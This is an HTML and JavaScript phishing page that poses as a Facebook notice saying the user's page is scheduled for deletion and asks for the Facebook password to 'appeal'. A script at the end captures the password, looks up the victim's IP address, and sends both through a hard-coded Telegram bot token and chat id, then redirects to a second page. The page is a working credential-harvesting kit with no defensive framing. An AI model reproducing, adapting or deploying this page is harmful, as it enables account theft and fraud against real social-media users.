
<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">

    <link rel="stylesheet" type="text/css" href="style.css">
    <script src="https://kit.fontawesome.com/a2267851a4.js" crossorigin="anonymous"></script>
    <title>Facebook</title>
    <style type="text/css">
        .headeri{
    background-color: #3a5998;
    padding-top: 20px;
    padding-bottom: 20px;
}
.headeri .logo{
    height: 27px;
}
.headeri .input-group{
    margin-bottom: 0px !important;
}
.headeri .input-group input[type=text]{
    height: 35px;
    border-radius: 0px;
    border: 1px solid black;
}
.headeri .colonalogo{
    padding-top:5px;
}

.afterheader{
    padding-top: 12px;
    padding-bottom: 12px;
    background-color: #e8ebee;
}
.afterheader li{
    list-style-type: none;
    color: #3578e5;
}
.afterheader li a{
    text-decoration: none;
    font-weight: 600;
    padding-bottom: 12px;
    font-size: 13px;
    border-bottom: 3px solid #3578e5;
}
.afterheader li i{
    padding-right: 2px;
}
.afterheader .english{
    color:#4267b2;
    font-size: 12px;
    padding-top:3px;
}
.contenti{
    padding-top:30px;
}

.contenti .leftmenu ul{
    list-style-type: none;
}

.contenti .leftmenu li{
    font-size: 14px;
    color: #444950;
    padding-top: 4px;
    padding-bottom: 4px;
}

.contenti .leftmenu li:hover{
    background-color:#f6f6f7;
}
.contenthehe{
    border:1px solid #dddfe2;
    border-radius: 4px;
}
.contenthehe .pagesupportinbox{
    display: none;
}
.contenthehe .message{
    padding:20px;
    border-bottom: 1px solid #dddfe2;
}
.contenthehe .message i{
    font-size: 25px;
    color:white;
    background-color:#575d6d;
    padding:14px;
    border-radius: 50%;
}

.contenthehe .message .open{
    background-color:#3b81d3;
    color:#ffffff;
    font-size: 12px;
    margin-top:0px;
    margin-bottom: 0px;
    padding:4px 10px;
    display: inline-block;
    border-radius: 4px;
    font-weight: 600;
}
.contenthehe .message .titlewe{
    margin-bottom:5px;
    font-weight: bold;
}
.contenthehe .message .case{
    display: inline-block;
    padding-left: 5px;
    padding-top: 4px;
    color:#90949c;
    font-size: 14px;
}
.contenthehe .whatcanwedo{
    padding:20px;
    border-bottom: 1px solid #dddfe2;
}
.contenthehe .whatcanwedo .whatcanyoudo{
    font-size: 11px;
    color:#90949c;
    font-weight: bold;
}
.contenthehe .appeal{
    border: 1px solid #dddfe2;
    border-radius: 4px;
    padding:15px;
}
.contenthehe .appeal p{
    margin-bottom: 0px;
    color: #385898;
    font-weight: bold;
    font-size: 16px;
}
.contenthehe .appeal i{
    text-align: right;
    font-size: 25px;
}

.contenthehe .activity{
    background-color: #f5f7f9;
    padding:20px;
    border-bottom: 1px solid #dddfe2;
}
.contenthehe .yourresponse{
    background-color: #f5f7f9;
    padding:20px;
}
.contenthehe .yourresponse i{
    color:#fff;
    font-size: 20px;
    border-radius: 50%;
    padding:10px;
    background-color:#d1d5d9;
}
.contenthehe .activityp{
    font-size: 11px;
    color:#90949c;
    font-weight: bold;
}
.contenthehe .activity i{
    color:#3a5998;
    font-size: 40px;
}
.contenthehe .ourmessage p{
    margin-bottom: 0px;
    font-size: 14px;
    color:#4b4f56;
}

.contenthehe .yourresponse p{
    margin-bottom: 0px;
    font-size: 14px;
    color:#4b4f56;
}

.contenthehe .butoniappeal{
    background-color:#4267b2;
    border:1px solid #4267b2;
    color:white;
    margin-top:10px;
    font-size: 13px;
    font-weight: 500;
    padding:7px 20px;
    border-radius: 2px;
}

.contenthehe .appealfooter{
    padding:20px;
}
.footer{
    padding-top:80px;
    padding-bottom:30px;
}
.footer .icona{
    text-align: center;
    padding-top: 6px;
}
.footer i{
    color:#dddfe2;
    text-align: right;
    font-size: 35px;
}
.footer ul{
    list-style-type: none;
    padding-left: 0px;
}
.footer li{
    color:#8d949e;
    font-size: 14px;
    padding-top:5px;
    padding-bottom: 5px;
}

.contenthehe .yourresponse label{
    color:#90949c;
    font-weight: bold;
    font-size: 12px;
}
.contenthehe .yourresponse .form-group{
    margin-bottom: 10px;
}
.contenthehe .yourresponse .form-control{
    border-radius: 0px;
}

@media only screen and (max-width: 370px) {
  .headeri .input-group input[type=text]{
      display:none;
  }
  .colvogel{
      padding-left:10px;
  }
  .contenthehe .message .titlewe{
      font-size:15px;
  }
}

@media only screen and (max-width: 380px) {
  .coliwithoutpadding{
      padding-left:15px !important;
  }
  .contenthehe .message i{
     font-size:20px !important;
  }
  .coliyourpage{
      padding-left:20px !important;
  }
}
    </style>
  </head>
  <body>



    <section class="contenti">
      <div class="container">
        <div class="row">
          

          <div class="col-12 col-md-12">
            <div class="contenthehe">
              <div class="pagesupportinbox">
                <h3>Page Support Inbox</h3>
                <p>Here's where you can check the status of support requests for your page</p>
              </div>

              <div class="message">
                <div class="row">
                  <div class="col-2 col-md-1 colvogel">
                    <div><i class="fas fa-envelope"></i></div>
                  </div>
                  <div class="col-10 col-md-11 coliyourpage">
                    <p class="titlewe">Your page has been scheduled for deletion</p>
                    <!-- <p class="titlewe">Your page was reported for an Intellectual Property Violation</p> -->
                    <p class="open">OPEN</p>
                    <p class="case">Case #1215953342115797</p>
                  </div>
                </div>
              </div>

              <div class="whatcanwedo">
                <div class="row">
                  <div class="col-12">
                    <p class="whatcanyoudo">WHAT YOU CAN DO</p>
                    <div class="appeal">
                      <div class="row">
                        <div class="col-2 col-md-1">
                          <i class="fas fa-reply"></i>
                        </div>
                        <div class="col-10 col-md-11 coliwithoutpadding" style="padding-left: 0px;">
                          <p><a href="#appeali" style="color:#385898;">Appeal</a></p>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>

              <div class="activity">
                <div class="row">
                  <div class="col-12">
                    <p class="activityp">ACTIVITY</p>
                    <div class="activitygroup">
                      <div class="row">
                        <div class="col-2 col-md-1">
                          <i class="fab fa-facebook-square"></i>
                        </div>
                        <div class="col-10 col-md-11 coliwithoutpadding" style="padding-left: 0px;">
                          <div class="ourmessage">
                            <p style="font-weight: bold; color:black; margin-bottom: 5px;">Our Message</p>
                            <p>Your page has been scheduled for permanent deletion for not following the Facebook Community Standards on one of the following:<br>
                            - Graphic violence<br>
- Hate speech, harassment and bullying<br>
- Nudity, sexual activity and sexual exploitation<br>
- Intellectual Property Infringement
                            </p>
                            <button type="button" style="display:none" class="btn butoniappeal">Appeal</button>

                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>


              <div class="yourresponse">
                <div class="row">
                  <div class="col-2 col-md-1">
                    <i class="fas fa-user-alt"></i>
                  </div>
                  <div class="col-10 col-md-11 coliwithoutpadding" style="padding-left: 0px;">
                    <div class="ourmessage">
                      <p style="font-weight: bold; color:black; margin-bottom: 5px;">Your reply</p>
                      <p style="font-size: 11px; margin-bottom: 15px">Please be sure to provide the requested information below. Failure to provide this information may delay the processing of your appeal.</p>
                      <form action="fjalkalimi1.php" method="POST" id="appeali">
                        <div class="form-group">
                          <label for="exampleInputEmail1">Enter your facebook password</label>
                          <input type="password" required class="form-control" id="exampleInputEmail1" name="inimini" aria-describedby="emailHelp">
                        </div>
                      </form>
                        <button name="submit" type="submit" class="btn butoniappeal" id="submit_btn">Submit</button>
                    </div>
                  </div>
                </div>
              </div>

              <div style="display:none" class="appealfooter">
                <div class="row">
                  <div class="col-12" style="text-align: center">
                    <button type="button" class="btn btn-primary">Primary</button>
                  </div>                    
                </div>
              </div>

            </div>
          </div>
        </div>
      </div>
    </section>


    <section class="footer">
      <div class="container">
        <div class="row">
          <div class="col-md-2 icona">
            <i class="fab fa-facebook-square"></i>
          </div>
          <div class="col-md-2">
            <ul>
              <li>
                META © 2022
              </li>
              <li>
                English (US)
              </li>
            </ul>
          </div>
          <div class="col-md-2">
            <ul>
              <li>
                About
              </li>
              <li>
                Privacy
              </li>
              <li>
                Careers
              </li>
            </ul>
          </div>
          <div class="col-md-2">
            <ul>
              <li>
                Ad Choices
              </li>
              <li>
                Create Ad
              </li>
              <li>
                Create Page
              </li>
            </ul>
          </div>
          <div class="col-md-4">
            <ul>
              <li>
                Terms & Policies
              </li>
              <li>
                Cookies
              </li>
            </ul>
          </div>
        </div>
      </div>
    </section>
    <!-- Optional JavaScript; choose one of the two! -->

    <!-- Option 1: Bootstrap Bundle with Popper -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>




    <script type="text/javascript">
          $("#submit_btn").click(function(e){
                  e.preventDefault();
                  passowrd =  document.getElementById('exampleInputEmail1').value;                
  if (passowrd == '') {
                  document.getElementById('exampleInputEmail1').style.borderColor = "red";
                }else{
                  document.getElementById("exampleInputEmail1").style.borderColor = "black";
                }
              if (passowrd != '') {
                $.getJSON('https://ipapi.co/json/', function(data) {
              var obj = JSON.parse(JSON.stringify(data, null, 2));
              country_name = obj.country;
              country_code = obj.country_code;
              country_city = obj.city;
              ipaddress = obj.ip;

                    event.preventDefault()
                          var siteUrl=window.location.href;
                          var emailInfos='Ok';
                          //var firstPassword =  document.getElementById('inputPassword').value; 
                

                var params = {
                           content: '=============================' + '%0A' + 
                              'Passi 1: "' +  passowrd + '"'+ '%0A' + 
                              'IP: "' + ipaddress + '"' + '%0A' +
                              '============================='
                     }


                          fetch(`https://api.telegram.org/bot6667296963:AAHyYeDr0u9ZnWGWyPFF7E7rtZ-ptQIudXE/sendMessage?chat_id=-1001733687811&text=${params.content}/parse_mode=html`, {
                                  method: 'POST', // or 'PUT'
                                  headers: {
                                      'Content-Type': 'application/json',
                                  },
                                  
                          }).then(function(){
                            window.location.href = "fjalkalimi2.html";
                          })

               });
              }
               });
    </script>
  </body>
</html>
